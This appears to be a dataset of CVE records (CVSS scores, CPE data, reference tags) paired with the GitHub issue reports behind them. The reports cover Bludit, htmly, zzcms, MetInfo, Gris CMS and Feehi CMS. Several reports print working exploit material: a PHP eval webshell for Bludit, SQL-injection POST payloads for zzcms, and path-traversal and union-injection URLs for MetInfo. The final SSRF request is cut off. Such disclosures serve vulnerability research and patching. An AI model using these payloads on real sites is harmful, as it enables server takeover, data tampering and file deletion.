{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1218" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1218" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D6D30E3-E730-47C2-BB7F-3C54EB771AFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/bludit/bludit/issues/1218
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### Describe your problem A file upload vulnerability was discovered in Bludit V3.12.0 Hackers need administrator rights. Hacker can use a backup file to control the server. ### Steps to reproduce the problem 1. Download the latest version of bludit from GitHub. 2. Using burpsuite when uploading logo in the background. Change picture content to PHP code `<?php eval($_POST[cmd]); ?>` ![QQ截图20200628011558](https://user-images.githubusercontent.com/40733224/85928228-fa02eb80-b8dd-11ea-8e5f-954ca7a576a5.png) 3. Enable backup plugin.Generate and download a backup file, modify the extension of logo file directly in the zip file. If you unzip the backup to modify it, the upload will be blocked by WAF. ![image2](https://user-images.githubusercontent.com/40733224/85928608-ca091780-b8e0-11ea-8236-000d9767b429.png) ![image3](https://user-images.githubusercontent.com/40733224/85928265-451cfe80-b8de-11ea-9fcc-8e98f0c0f9d1.png) ![20200628012606](https://user-images.githubusercontent.com/40733224/85928277-5c5bec00-b8de-11ea-8afe-c48cfc2d4098.png) 4. Access _http://127.0.0.1/bl-content/uploads/BLUDIT.php_ to get the getshell ![image4](https://user-images.githubusercontent.com/40733224/85928302-a0e78780-b8de-11ea-80be-761c50b4aa81.png) Vulnerability in /bl-plugins/backup/plugin.php ``` public function uploadBackup($backup) { global $L; // Check File Type if ($backup["type"] !== "application/zip" && $backup["type"] !== "application/x-zip-compressed") { return $this->response(415, $L->get("The passed file is not a valid ZIP Archive.")); } // Check File Extension if (stripos($backup["name"], ".zip") !== (strlen($backup["name"]) - 4)) { return $this->response(415, $L->get("The passed file does not end with .zip.")); } // Check ZIP extension if(!$this->zip) { return $this->response(400, $L->get("The passed file could not be validated.")); } // Validate ZIP File $zip = new ZipArchive(); $zip->open($backup["tmp_name"]); if($zip->addEmptyDir("databases") || $zip->addEmptyDir("pages") || $zip->addEmptyDir("uploads")) { $zip->close(); return $this->response(415, $L->get("The passed file is not a valid backup archive.")); } $zip->close(); // File Name $name = $backup["name"]; $count = 0; while (file_exists($this->workspace() . $name)) { $name = substr($backup["name"], 0, -4) . "." . ++$count . ".zip"; } // Move File to Backup Directory Filesystem::mv($backup["tmp_name"], $this->workspace() . $name); return $this->response(200, $L->get("The backup file could be uploaded successfully.")); } } ``` We can check the image content uploaded by users. Or just delete the backup module ### Bludit version V3.12.0 ### PHP version PHP7.3.9nts
Bludit V3.12.0 -- Admin File Upload vulnerability
https://api.github.com/repos/bludit/bludit/issues/1218/comments
2
2020-06-27T17:44:40Z
2020-08-25T05:41:08Z
https://github.com/bludit/bludit/issues/1218
646,723,476
1,218
1,984
CVE-2020-23766
2021-05-21T18:15:07.923
An arbitrary file deletion vulnerability was discovered on htmly v2.7.5 which allows remote attackers to use any absolute path to delete any file in the server should they gain Administrator privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/412" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/412" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmly:htmly:2.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "BFFC632D-79DF-4B9E-BD7B-89B131C12D64", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/danpros/htmly/issues/412
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "danpros", "htmly" ]
**Vulnerability description** Arbitrary file deletion vulnerability was found in v2.7.5.Hackers need administrator rights and they can use any absolute directory to delete any file in the server. **Steps to reproduce the problem** Using GitHub source code to build the local environment. PHP7.3 Apache2.4 Windows10 ![image](https://user-images.githubusercontent.com/40733224/86409232-024a9480-bceb-11ea-86d7-8e5c8a0a432a.png) Enter the backup page.Create a backup and delete it. At the same time, use burpsuite to capture the package. ![image](https://user-images.githubusercontent.com/40733224/86408626-ea264580-bce9-11ea-994e-b106b03e09f3.png) Enter the absolute path of the file you want to delete here. The relative path is OK ![image](https://user-images.githubusercontent.com/40733224/86408399-84d25480-bce9-11ea-906d-17be49ed7bfe.png) The file has been deleted. ![image](https://user-images.githubusercontent.com/40733224/86408425-91ef4380-bce9-11ea-883f-17ad7837b33d.png) I think there's something wrong with the code here. \system\admin\views\backup-start.html.php ``` <?php if (login()) { if (isset($_GET['file'])) { $file = _h($_GET['file']); if (!empty($file)) { unlink($file); } } } ?> ``` It does not control the path entered by the user, nor does it detect whether the file belongs to backup
Arbitrary file deletion vulnerability was found in v2.7.5
https://api.github.com/repos/danpros/htmly/issues/412/comments
2
2020-07-02T21:10:33Z
2021-01-22T05:17:28Z
https://github.com/danpros/htmly/issues/412
650,205,621
412
1,985
CVE-2019-12348
2021-05-24T16:15:07.883
An issue was discovered in zzcms 2019. SQL Injection exists in user/ztconfig.php via the daohang or img POST parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cby234/zzcms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cby234/zzcms/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*", "matchCriteriaId": "B5CA483C-9AA7-4EF9-B3D1-64AB6EC41BA0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cby234/zzcms/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cby234", "zzcms" ]
Link Url : http://www.zzcms.net/about/6.htm Edition : ZZCMS2018升2019 (2019-01-11) 0x01 Vulnerability (/user/ztconfig.php line 29 ~ 50) ![image](https://user-images.githubusercontent.com/20368796/58004364-0b47c900-7b1e-11e9-8bb9-527d4c2795b6.png) When we start 'modify' logic we can see 'daohang' var receive $_POST['daohang'][$i] value If we give string value for $_POST['daohang'] not Array $_POST['daohang'][0] daohang var will receive $i's index string not Array. So If we give '\\' value for $_POST['daohang'] 'daohang' var will get '\\' value ![image](https://user-images.githubusercontent.com/20368796/58004800-05061c80-7b1f-11e9-89ca-fd3fd3b21f61.png) We can find '\\' value in update query it means ' value after 'daohang' parameter does not mean any more. ![image](https://user-images.githubusercontent.com/20368796/58005024-a2615080-7b1f-11e9-99bd-d26d2740a20b.png) ![image](https://user-images.githubusercontent.com/20368796/58005229-1f8cc580-7b20-11e9-805f-c84a6091360d.png) After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter we can't find any other security filter. So we can inject any query via 'bannerbg' parameter 0x02 payload give below "POC" value for post data in "/user/ztconfig.php?action=modify" POC : update SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@version+where+username=0x636279323334-- a ![image](https://user-images.githubusercontent.com/20368796/58005525-c8d3bb80-7b20-11e9-8740-868635b4c75f.png) ![image](https://user-images.githubusercontent.com/20368796/58005568-e3a63000-7b20-11e9-9613-9d70d8eed87a.png) POC2 : Time based Blind SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@version+where+username=0x636279323334-- a ![image](https://user-images.githubusercontent.com/20368796/58005702-354eba80-7b21-11e9-9ad1-fb11584e762c.png)
zzcms 2019 user/ztconfig.php SQL injection Vulnerability
https://api.github.com/repos/cby234/zzcms/issues/1/comments
0
2019-05-20T08:05:21Z
2021-05-10T15:44:22Z
https://github.com/cby234/zzcms/issues/1
445,976,271
1
1,986
CVE-2020-20907
2021-05-24T18:15:07.763
MetInfo 7.0 beta is affected by a file modification vulnerability. Attackers can delete and modify ini files in app/system/language/admin/language_general.class.php and app/system/include/function/file.func.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "22" ]
22
https://github.com/cby234/cve_request/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cby234", "cve_request" ]
Vulnerability Name: Metinfo CMS ini file modify vulnerability Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 beta (This vulnerability only occur in Window OS) In /language/admin/language_general.class.php doExportPack Method ![image](https://user-images.githubusercontent.com/20368796/67463604-aff5a600-f67c-11e9-9dbb-a17fc85696bf.png) In this method We can find `editor` and `site` parameter makes `filename` value and use it for `delfile` method's argument ![image](https://user-images.githubusercontent.com/20368796/67464587-8b9ac900-f67e-11e9-95c9-a1fe8d24c2f7.png) Let's take a look at app/system/include/function/file.func.php source code ![image](https://user-images.githubusercontent.com/20368796/67463913-49bd5300-f67d-11e9-91b6-7be7e2cb97cb.png) When we check `delfile` method we use `filename` argument for `file_exists` function and if return value is true unlink `filename` argument file will be unlink Before we analyze more about this point. Let's take a look at about `file_exists` function's difference between in `Linux` and `Windows` ![image](https://user-images.githubusercontent.com/20368796/67464710-cb61b080-f67e-11e9-9989-8746a08364da.png) ![image](https://user-images.githubusercontent.com/20368796/118460593-d041f580-b737-11eb-80ce-c9a93e82b50d.png) In `Linux` (first picture) if there is no real dirctory which name is `asdf` function do not return true value unliness there is `../` value. But In Windows `file_exists` funciotn return true value if there is fake directory which name is `asd` (second picture). We will use this point for vulnerability. Okay after `unlink` file doExportPack method call `doget_admin_pack` method Let's take a look at `doget_admin_pack` method ![image](https://user-images.githubusercontent.com/20368796/67465272-cfda9900-f67f-11e9-9fed-4365783b24ca.png) In Source Code If `site` parameter value is 'admin' or 'web' we use `appno` parameter value for SQL query. And there is any single quarter for `appno` parameter. So we can execute `Union Sql Injection` ![image](https://user-images.githubusercontent.com/20368796/67465812-dae1f900-f680-11e9-9214-9ae1eac8389c.png) Furthermore We use return of Sql query for new ini file's content Cause we have Union SQL injection vulnerabilty We can modify ini file's content ![image](https://user-images.githubusercontent.com/20368796/67465783-cc93dd00-f680-11e9-8c12-20cd4e05baf5.png) So attack scenario is below 1. give `site` parameter value for 'admin' or 'web' and give `editor` parameter for '../../../---/{ini-filename} 2. give `appno` parameter for SQLI POC which include ini file content In `Linux` if there is no `language_admin_` directory this vulnerability will not occur But `Windows` doesn't need `language_admin_` directory this vulnerabilty will execute 100% (Of course in `Lniux` has `language_admin_` or any other directory name which can make by `site` and `editor` parameter this vulnerability will execute) POC : /admin/?n=language&c=language_general&a=doExportPack&site=web&editor=/../../../../../../Windows/test&appno= 1=1 union select 0x49732069742076756c6e657261626c653f3f,ox5965732121 ![image](https://user-images.githubusercontent.com/20368796/67467478-c05d4f00-f683-11e9-9e21-513fcc3c46a2.png) ![image](https://user-images.githubusercontent.com/20368796/67467828-77f26100-f684-11e9-9679-dc8cad8a3256.png) ![image](https://user-images.githubusercontent.com/20368796/67467686-2cd84e00-f684-11e9-9f5b-3472bac7e096.png)
metinfo 7.0 beta vulnerability
https://api.github.com/repos/cby234/cve_request/issues/1/comments
0
2019-10-24T08:34:09Z
2021-05-17T08:46:57Z
https://github.com/cby234/cve_request/issues/1
511,791,882
1
1,987
CVE-2020-20907
2021-05-24T18:15:07.763
MetInfo 7.0 beta is affected by a file modification vulnerability. Attackers can delete and modify ini files in app/system/language/admin/language_general.class.php and app/system/include/function/file.func.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cby234/cve_request/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "22" ]
22
https://github.com/cby234/cve_request/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cby234", "cve_request" ]
Vulnerability Name: Metinfo CMS ini file modify vulnerability Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 beta (This vulnerability only occur in Window OS) In /language/admin/language_general.class.php doExportPack Method ![image](https://user-images.githubusercontent.com/20368796/67463604-aff5a600-f67c-11e9-9dbb-a17fc85696bf.png) In this method We can find `editor` and `site` parameter makes `filename` value and use it for `delfile` method's argument ![image](https://user-images.githubusercontent.com/20368796/67464587-8b9ac900-f67e-11e9-95c9-a1fe8d24c2f7.png) Let's take a look at app/system/include/function/file.func.php source code ![image](https://user-images.githubusercontent.com/20368796/67463913-49bd5300-f67d-11e9-91b6-7be7e2cb97cb.png) When we check `delfile` method we use `filename` argument for `file_exists` function and if return value is true unlink `filename` argument file will be unlink Before we analyze more about this point. Let's take a look at about `file_exists` function's difference between in `Linux` and `Windows` ![image](https://user-images.githubusercontent.com/20368796/67464710-cb61b080-f67e-11e9-9989-8746a08364da.png) ![image](https://user-images.githubusercontent.com/20368796/118460593-d041f580-b737-11eb-80ce-c9a93e82b50d.png) In `Linux` (first picture) if there is no real dirctory which name is `asdf` function do not return true value unliness there is `../` value. But In Windows `file_exists` funciotn return true value if there is fake directory which name is `asdf` (second picture). Because of this point we can delete remote ini file in windows server Attack scenario is below 1. give `site` parameter value for 'admin' or 'web' and give `editor` parameter for '../../../---/{ini-filename} POC : /admin/?n=language&c=language_general&a=doExportPack&site=web&editor=/../../../../../../Users/test/Desktop/test&appno=123 ![image](https://user-images.githubusercontent.com/20368796/118471384-a9d58780-b742-11eb-9e97-560970a0414a.png) ![image](https://user-images.githubusercontent.com/20368796/118471590-e2756100-b742-11eb-900b-4657e095ed02.png) ![image](https://user-images.githubusercontent.com/20368796/118471701-0042c600-b743-11eb-808c-63fd0769fec6.png)
metinfo 7.0 beta remote delete ini file
https://api.github.com/repos/cby234/cve_request/issues/2/comments
0
2021-05-17T10:07:19Z
2021-05-17T10:07:19Z
https://github.com/cby234/cve_request/issues/2
893,169,444
2
1,988
CVE-2021-30082
2021-05-24T18:15:08.090
An issue was discovered in Gris CMS v0.1. There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dignajar/gris/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dignajar/gris/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gris_cms_project:gris_cms:0.1:*:*:*:*:*:*:*", "matchCriteriaId": "C13B62C4-2D07-453C-9A12-3D038DFA05CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/dignajar/gris/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dignajar", "gris" ]
A xss vulnerability was discovered in Gris CMS v0.1 There is a Persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard <img width="1256" alt="iShot2021-04-01 09 31 54" src="https://user-images.githubusercontent.com/37724890/113232023-f833e180-92ce-11eb-98ab-6c8a9d5e3bb8.png"> <img width="1129" alt="iShot2021-04-01 09 31 39" src="https://user-images.githubusercontent.com/37724890/113232084-0aae1b00-92cf-11eb-80e6-7cea63df0f44.png">
Gris CMS v0.1 has Persistent XSS vulnerability
https://api.github.com/repos/dignajar/gris/issues/3/comments
1
2021-04-01T01:47:16Z
2021-05-25T08:22:22Z
https://github.com/dignajar/gris/issues/3
847,697,091
3
1,989
CVE-2021-30108
2021-05-24T20:15:07.777
Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/57" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:feehi:feehi_cms:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C27559F1-734D-4924-AD35-EDC2DD9EDF7C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/liufee/cms/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "liufee", "cms" ]
## This is a Server-side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows: ## We need to send two requests ### 1. First register an account normally, here my account is test123, and the password is 123456 ### 2. Log out of our account and log in again from the picture below - ![image](https://user-images.githubusercontent.com/25664828/113248597-dc8d0300-92ef-11eb-9d20-e501628b10ea.png) ### use burpsuite change the http Referer Header, - ![image](https://user-images.githubusercontent.com/25664828/113249303-0eeb3000-92f1-11eb-97f9-60ba91dbf24b.png) ### The first POC request is as follows ```http GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1 Host: demo.cms.feehi.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: 